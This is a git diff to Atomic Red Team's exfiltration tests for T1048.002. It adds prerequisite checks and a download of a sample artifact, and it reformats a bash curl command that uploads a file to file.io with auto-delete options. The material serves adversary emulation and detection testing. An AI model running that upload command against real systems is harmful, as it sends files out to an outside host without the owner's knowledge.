diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index b984fc57..590bbb22 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -101642,6 +101642,13 @@ exfiltration: Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe Remove-Item $env:temp\curl Remove-Item $env:temp\curl.zip + - description: "#{input_file} must be exist on system.\n" + prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1048.002/src/artifact" -OutFile "#{input_file}" executor: name: command_prompt elevation_required: false @@ -101663,8 +101670,10 @@ exfiltration: executor: name: bash elevation_required: false - command: curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' + command: 'curl -F ''file=@#{input_file}'' -F ''maxDownloads=1'' -F ''autoDelete=true'' https://file.io/ + + ' T1041: technique: x_mitre_platforms: diff --git a/atomics/T1048.002/T1048.002.md b/atomics/T1048.002/T1048.002.md index 61680bcf..3c7cef5b 100644 --- a/atomics/T1048.002/T1048.002.md +++ b/atomics/T1048.002/T1048.002.md @@ -58,6 +58,16 @@ Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System3 Remove-Item $env:temp\curl Remove-Item $env:temp\curl.zip ``` +##### Description: #{input_file} must be exist on system. +##### Check Prereq Commands: +```powershell +if (Test-Path #{input_file}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1048.002/src/artifact" -OutFile "#{input_file}" +```